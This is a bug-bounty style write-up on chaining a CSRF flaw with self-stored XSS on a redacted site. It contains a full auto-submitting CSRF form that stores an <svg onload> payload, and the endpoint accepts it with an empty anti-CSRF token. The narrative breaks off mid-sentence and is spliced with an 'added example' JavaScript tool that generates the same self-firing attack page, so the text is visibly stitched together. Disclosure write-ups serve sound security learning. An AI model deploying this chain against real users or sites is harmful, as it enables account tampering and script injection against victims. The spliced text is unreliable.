CSRF Attack can lead to Stored XSS

Heeeeeey guys, I'm here again with a new write-up about CSRF with XSS :P.

A few days ago I was testing a website, let's call it example.com, and I found a subdomain with a handful of functions, so I started testing it. I found a self-stored XSS in a description field that allows HTML tags, and I found a CSRF that could add the XSS payload, but there was a problem: I needed the template ID to edit the template and I couldn't brute-force it, so at the time I left it alone. When I came back to test recently, I opened Burp and captured the requests. One interesting request caught my eye; I sent it to Repeater, replayed it, and a new template was added to my template list. WOW, this is good. I looked over the request and didn't find any CSRF protection.

The cool thing is that the request includes the template ID, which I can use to add content to the template fields. That's when I remembered the old bug, the self-stored XSS, so I tried to chain the two bugs together to get stored XSS. I created an HTML file as a PoC; this is the code:

<!-- CSRF PoC: POSTs a template SAVE request with the XSS payload in the description field.
     stok (the anti-CSRF token parameter) is left empty: the endpoint accepted the request without it. -->
<form id="csrf" action="https://subdomain.example.com/endpoint" method="POST">
<input type="text" name="svcid" value="WRKSPC_LAYER_SERVICE"><br>
<input type="text" name="stok" value=""><br>
<input type="text" name="v" value="0"><br>
<input type="text" name="clientType" value=""><br>
<input type="text" name="request" value='{"basePage":{"draftIds":["1514844016810"],"wsId":"-1","wsType":"-1"},"fields":{"title":"CSRF_1","bold":"false"},"fields":{"description":"<font rwr=\"1\" style=\"font-family:Arial\" size=\"4\"><br>\"&gt;<svg onload=\"alert(cookie)\">\n</svg></font>","rteMode":"0"},"mode":"INDIVIDUAL","action":"SAVE","layerName":"EDITPANE","variation":null,"currencyInfo":{"currencySymbolLeft":true,"singularName":"U.S. dollars","moneySymbol":"$","decimalSymbol":".","groupingSymbol":",","gS":",","decimalPlaces":"2","currencyCode":"USD","pluralName":"U.S. dollar"},"singleList":true,"listingMode":"AddItem","updateRequired":true,"customFields":{},"byPassUpdate":false,"sellerType":"C2C","saveUlsi":true,"edpCrNew":false,"deletedFields":[],"customAttributes":{"PL_SELLER_ELIGIBLE":"1","PL_FORMAT_ELIGIBLE":"1","PL_CATEGORY_ELIGIBLE":"1","PL_ALREADY_OPTED":"0"},"draftMode":"Listing","restricted":false,"customPreference":{"preferences":{"scheduleStartTime":true,"reservePrice":true,"sellAsLot":true,"privateListing":true,"salesTax":true},"sellerDetails":["BUSINESS_POLICY","NO_STORE_SUBSCRIPTION","NO_SHIPPING_DISCOUNTS","NON_SM_SELLER"]},"payments20":false,"templateId":5553489011,"isvShown":false}'><br>
<input type="submit" value="send">
</form>
<!-- submit automatically so the victim only has to load the page -->
<script>document.getElementById("csrf").submit();</script>

This code sends a request to edit a template with ID 1514844016810 (the draftIds value in the request). The server won't find a template with this ID, so it creates one and saves the new value, the XSS payload, in the description. Note that stok, which by its name should carry an anti-CSRF token, is sent empty and the request still goes through. When the victim visits his template list he will find a new template; he opens it and BOOOM, the XSS payload executes. I was:
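To see the chain in code rather than as a hand-edited form, here is an added example in JavaScript (not from the original write-up) that generates the same auto-submitting PoC page from the captured request. It reuses the endpoint, parameter names, IDs and JSON body of the form above; the endpoint URL is the write-up's own placeholder, and merging the duplicated "fields" key into a single object is an assumption, noted in the code.

```javascript
// Added example, not part of the original write-up: generate an auto-submitting
// CSRF PoC page from the captured request instead of hand-editing an HTML form.
// The endpoint URL, parameter names, IDs and JSON body mirror the write-up;
// https://subdomain.example.com/endpoint is the placeholder the write-up uses.

// Escape a string for use inside a double-quoted HTML attribute. The hand-written
// PoC single-quotes the value attribute, which breaks the moment the JSON contains
// a single quote, so every significant character is escaped here instead.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Inverse of htmlEscape, used to confirm the browser decodes the value attribute
// back to the exact request body (ampersands are decoded last).
function htmlUnescape(s) {
  return String(s)
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Payload stored in the description field, as in the write-up: the field keeps
// HTML tags, and the "&gt; sequence breaks out of the surrounding attribute before
// the <svg onload> fires.
const XSS_PAYLOAD =
  '<font rwr="1" style="font-family:Arial" size="4"><br>"&gt;<svg onload="alert(cookie)">\n</svg></font>';

// The JSON "request" parameter. Building it as an object lets JSON.stringify do
// the escaping. Assumption: the write-up's body repeats the "fields" key, which
// JSON.parse (and most server-side parsers) resolve to the last occurrence; the
// two objects are merged here so title/bold are not silently dropped.
function buildRequestJson(draftId, templateId, description) {
  return JSON.stringify({
    basePage: { draftIds: [draftId], wsId: '-1', wsType: '-1' },
    fields: { title: 'CSRF_1', bold: 'false', description, rteMode: '0' },
    mode: 'INDIVIDUAL', action: 'SAVE', layerName: 'EDITPANE', variation: null,
    currencyInfo: {
      currencySymbolLeft: true, singularName: 'U.S. dollars', moneySymbol: '$',
      decimalSymbol: '.', groupingSymbol: ',', gS: ',', decimalPlaces: '2',
      currencyCode: 'USD', pluralName: 'U.S. dollar',
    },
    singleList: true, listingMode: 'AddItem', updateRequired: true, customFields: {},
    byPassUpdate: false, sellerType: 'C2C', saveUlsi: true, edpCrNew: false, deletedFields: [],
    customAttributes: {
      PL_SELLER_ELIGIBLE: '1', PL_FORMAT_ELIGIBLE: '1', PL_CATEGORY_ELIGIBLE: '1', PL_ALREADY_OPTED: '0',
    },
    draftMode: 'Listing', restricted: false,
    customPreference: {
      preferences: { scheduleStartTime: true, reservePrice: true, sellAsLot: true, privateListing: true, salesTax: true },
      sellerDetails: ['BUSINESS_POLICY', 'NO_STORE_SUBSCRIPTION', 'NO_SHIPPING_DISCOUNTS', 'NON_SM_SELLER'],
    },
    payments20: false, templateId, isvShown: false,
  });
}

// Render a self-submitting POST form. The browser sends the inputs as
// application/x-www-form-urlencoded, exactly like the original form, and the
// victim only has to load the page: there is no "send" button to click.
function buildCsrfPoc(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `  <input type="hidden" name="${htmlEscape(name)}" value="${htmlEscape(value)}">`)
    .join('\n');
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    `<form id="csrf" action="${htmlEscape(action)}" method="POST">`,
    inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Assemble the PoC for the write-up's request. stok, which by its name carries an
// anti-CSRF token, is sent empty: the endpoint accepted the request without it.
function buildPoc() {
  const fields = {
    svcid: 'WRKSPC_LAYER_SERVICE',
    stok: '',
    v: '0',
    clientType: '',
    request: buildRequestJson('1514844016810', 5553489011, XSS_PAYLOAD),
  };
  return buildCsrfPoc('https://subdomain.example.com/endpoint', fields);
}

// Usage: node poc.js > poc.html
console.log(buildPoc());
```

The point of generating the page rather than hand-writing it is that the JSON body is escaped correctly whatever characters the payload contains, the payload itself never appears unescaped in the attacker's page, and the request fires as soon as the victim loads the page.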

I hope you enjoy it guys goodbye see you soon.